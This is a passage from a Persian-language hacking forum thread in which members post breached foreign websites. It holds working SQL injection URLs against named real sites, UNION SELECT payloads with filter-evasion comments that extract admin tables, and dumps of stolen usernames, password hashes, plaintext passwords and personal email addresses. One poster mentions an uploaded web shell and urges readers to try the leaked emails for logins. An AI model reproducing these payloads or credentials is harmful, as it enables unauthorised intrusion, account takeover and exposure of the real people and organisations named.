پرش به


تصویر

دیتابیس سایت های مورد نفوذ قرار گرفته (خارجی)

اختصاصی

 • لطفا وارد حساب کاربری خود شوید تا بتوانید پاسخ دهید
217 پاسخ برای این موضوع

#91 ارسالی 31 مه 2016 - 10:25

Danger BoY
+2,705
  OFFLINE
  تاریخ عضویت :
  31 دسامبر 2015
 • Attacker
 • VIP
 • 536 ارسال
  Last Visit 4 روز قبل
 • Slogan : My enemies have to sit for my Progress movie review
 • Country :
 • Gender : Male
 • Location : Your Server
 • Name : Unknown

تارگت :
 

http://www.meatland.co.il

 

 

لینک اینجکت :

 

http://www.meatland....oducts&catid=49

 

 

یوزر :

 

admin

 

 

پسورد :

 

a6c8f5d9d62de335e2a1e55eac7c96ab

 

----------------------------------------------------------------------------


image.gif
Iranonymous Security Team


++++++++++++++++++++++++++++++++
icon3.png


#92 ارسالی 03 ژوئن 2016 - 05:34

  OFFLINE
  تاریخ عضویت :
  16 نوامبر 2015
 • Professional Hacker
 • Super Moderator
 • 596 ارسال
  Last Visit مارس 06 2018 11:51
 • Slogan : SEC_RITY is not complete without U!
 • Country :
 • Gender : Male
 • Location : IN YOUR SYSTEM
 • Name : Lord Black
http://www.xcmg.com.ni/

login :

http://www.xcmg.com.ni/admin/login.php

لینک اینجکت :

http://www.xcmg.com.ni/results.php?id=-11'+/*!50000UNION*/+/*!50000SELECT*/+1,/*!50000GroUp_CoNcAt(0x3c62723e,0x4944203a20,id,0x20557365726e616d65203a20,username,0x2050617373776f7264203a20,password,0x20456d61696c203a20,email,0x3c62723e3c68723e)*/,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255+/*!50000from*/+mt_users--+

255 تا :O :O :O رکورد زدم فکر کنم- فکر نمیکنم تو ایران کسی 255 تایی زده باشه.(یا زده و ما خبر نداریم)

ID : 1 Username : jairovargasg Password : xpass Email : jairovargasg@gmail.com
ID : 2 Username : mpereira Password : Pereira#01 Email : mariamartha.pereira@xcmgnicaragua.com
ID : 3 Username : marco Password : multitech15 Email : marco@multitechlabs.com

شلش هم قرار دادم در قسمت شل ها

و اینکه ایمیل هاشونم تست بزنین لاگین میشه بعضی هاش.

موفق باشید/.


Exploit-DB

(( AirSploit Framework Wireless Security To0l ))

GitHub :)

دیتابیس های مورد نفوذ قرار گرفته

آموزش کامل سیملینک

آپلود شل با هر نوع فرمتی

باگ های ثبت شده here & here

..:: Blackwolf_Iran ::..

------------------------------------------------------------------------------------------------------------------------------------------------------

Im Just a Security Researcher =)

image.gif


#93 ارسالی 03 ژوئن 2016 - 07:41

  OFFLINE
  تاریخ عضویت :
  16 نوامبر 2015
 • Professional Hacker
 • Super Moderator
 • 596 ارسال
  Last Visit مارس 06 2018 11:51
 • Slogan : SEC_RITY is not complete without U!
 • Country :
 • Gender : Male
 • Location : IN YOUR SYSTEM
 • Name : Lord Black

تارگت :

http://fundeser.org.ni

اینجکت :

http://fundeser.org.ni/index.php?mod=sucursales&action=open&id=-2'+/*!50000UNION*/+SELECT+1,/*!50000group_cONcAt(0x3c62723e,nombre,0x3a,password)*/,3,4,5,6,7,8,9,10,11,12,13+/*!50000from*/+usuarios--+
FUNDESER:123,
Alvaro Francisco Casco Guido:123

Exploit-DB

(( AirSploit Framework Wireless Security To0l ))

GitHub :)

دیتابیس های مورد نفوذ قرار گرفته

آموزش کامل سیملینک

آپلود شل با هر نوع فرمتی

باگ های ثبت شده here & here

..:: Blackwolf_Iran ::..

------------------------------------------------------------------------------------------------------------------------------------------------------

Im Just a Security Researcher =)

image.gif


#94 ارسالی 06 ژوئن 2016 - 08:06

Danger BoY
+2,705
  OFFLINE
  تاریخ عضویت :
  31 دسامبر 2015
 • Attacker
 • VIP
 • 536 ارسال
  Last Visit 4 روز قبل
 • Slogan : My enemies have to sit for my Progress movie review
 • Country :
 • Gender : Male
 • Location : Your Server
 • Name : Unknown

Target :

 

http://www.mourningbands.net/

 

 

Inject page :

 

http://www.mourningb...tactus.php?id=6

 

 

Username : admin

Password : 123456


image.gif
Iranonymous Security Team


++++++++++++++++++++++++++++++++
icon3.png


#95 ارسالی 10 ژوئن 2016 - 08:52

  OFFLINE
  تاریخ عضویت :
  23 سپتامبر 2015
 • %100██████████
 • VIP
 • 227 ارسال
  Last Visit 4 هفته قبل
 • Country :
 • Gender : Male
 • Name : alireza.ebis22
http://www.bawabatalsharq.ae/en/news-page.php?id=-113+UNION+SELECT+1,2,group_concat%28username,0x3a,password%29,4,0x6972616e6f6e796d6f75732e6f7267,0x696e6a656374656420627920616c6972657a612e65626c69733232,7,8,9+from+gci_admins
پسورد کرک شده:bas2014


:ph34r:We Are Iranian Aonymous :ph34r:


:angry:IM Alireza.eblis22 :angry:


:)Im white-hat :)


:xLove iran :x


:xLove you :x


#96 ارسالی 10 ژوئن 2016 - 08:54

  OFFLINE
  تاریخ عضویت :
  23 سپتامبر 2015
 • %100██████████
 • VIP
 • 227 ارسال
  Last Visit 4 هفته قبل
 • Country :
 • Gender : Male
 • Name : alireza.ebis22
http://www.bawabatalsharq.ae/ar/news-page.php?id=-113+UNION+SELECT+1,2,group_concat%28username,0x3a,password%29,4,0x6972616e6f6e796d6f75732e6f7267,0x696e6a656374656420627920616c6972657a612e65626c69733232,7,8,9+from+gci_admins
USER:root
PASS:kltpzycm
USER:admin
PASS:letmein

:ph34r:We Are Iranian Aonymous :ph34r:


:angry:IM Alireza.eblis22 :angry:


:)Im white-hat :)


:xLove iran :x


:xLove you :x


#97 ارسالی 10 ژوئن 2016 - 01:37

Danger BoY
+2,705
  OFFLINE
  تاریخ عضویت :
  31 دسامبر 2015
 • Attacker
 • VIP
 • 536 ارسال
  Last Visit 4 روز قبل
 • Slogan : My enemies have to sit for my Progress movie review
 • Country :
 • Gender : Male
 • Location : Your Server
 • Name : Unknown

Target :

 

http://www.greenfieldimpex.com

 

 

 

Inject Page :

 

http://www.greenfiel...iteup.php?wid=3

 

 

 

 

 

Username :mahmood

greenfieldimpex: Password

 

 


image.gif
Iranonymous Security Team


++++++++++++++++++++++++++++++++
icon3.png


#98 ارسالی 16 ژوئن 2016 - 05:48

  OFFLINE
  تاریخ عضویت :
  16 نوامبر 2015
 • Professional Hacker
 • Super Moderator
 • 596 ارسال
  Last Visit مارس 06 2018 11:51
 • Slogan : SEC_RITY is not complete without U!
 • Country :
 • Gender : Male
 • Location : IN YOUR SYSTEM
 • Name : Lord Black

تارگت :

http://www.nccf.org.ng/

لینک اینجکت »

http://www.nccf.org.ng/news.php?r_file_id=912076627&article=-1%27+UNION+SELECT+1,0x20496e6a656374656420427920426c61636b776f6c665f4972616e,%28select%20%28@x%29%20from%20%28select%20%28@x:=0x00%29,%28select%20%280%29%20from%20%28login%29%20where%20%280x00%29%20in%20%28@x:=concat%28@x,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e20557365726e616d65203a20,username,0x3c666f6e7420636f6c6f723d7265643e2050617373776f7264203a20,password%29%29%29%29x%29,4,5,6,7,8--+
 Username : olanrenwaju Password : nccfpublo2015

Exploit-DB

(( AirSploit Framework Wireless Security To0l ))

GitHub :)

دیتابیس های مورد نفوذ قرار گرفته

آموزش کامل سیملینک

آپلود شل با هر نوع فرمتی

باگ های ثبت شده here & here

..:: Blackwolf_Iran ::..

------------------------------------------------------------------------------------------------------------------------------------------------------

Im Just a Security Researcher =)

image.gif


#99 ارسالی 17 ژوئن 2016 - 03:39

Danger BoY
+2,705
  OFFLINE
  تاریخ عضویت :
  31 دسامبر 2015
 • Attacker
 • VIP
 • 536 ارسال
  Last Visit 4 روز قبل
 • Slogan : My enemies have to sit for my Progress movie review
 • Country :
 • Gender : Male
 • Location : Your Server
 • Name : Unknown
http://www.sapin.com.sa/content.php?pageid=29+order+by+10--

http://www.sapin.com.sa/content.php?pageid=29+union+select+1,2,3,4,5,6,7,8,9,10--

http://www.sapin.com.sa/content.php?pageid=29+union+select+1,version%28%29,3,4,5,6,7,8,9,10--

http://www.sapin.com.sa/content.php?pageid=29+union+select+1,group_concat%28table_name%29,3,4,5,6,7,8,9,10+from+information_schema.tables--

image.gif
Iranonymous Security Team


++++++++++++++++++++++++++++++++
icon3.png


#100 ارسالی 19 ژوئن 2016 - 11:19

Danger BoY
+2,705
  OFFLINE
  تاریخ عضویت :
  31 دسامبر 2015
 • Attacker
 • VIP
 • 536 ارسال
  Last Visit 4 روز قبل
 • Slogan : My enemies have to sit for my Progress movie review
 • Country :
 • Gender : Male
 • Location : Your Server
 • Name : Unknown

*
پست محبوب

Target :

 

http://www.c2-int.com

 

Inject Page :

 

http://www.c2-int.co...ull.php?id=1795

 

 

 

Username : michael

Password : 5ejufe

 

Username : rod

Password : ga3ra4

 

 

===============================

 

Database : c2deuts_ice

Table : admin2

Version : 5.1.2

==========================================

 

 

Good Luck


ویرایش شده توسط Danger BoY 19 ژوئن 2016 - 11:19 .

image.gif
Iranonymous Security Team


++++++++++++++++++++++++++++++++
icon3.png


0 کاربر در حال خواندن این موضوع است

0 کاربر، 0 مهمان و 0 عضو مخفی

رفتن به اول صفحه | Back To UP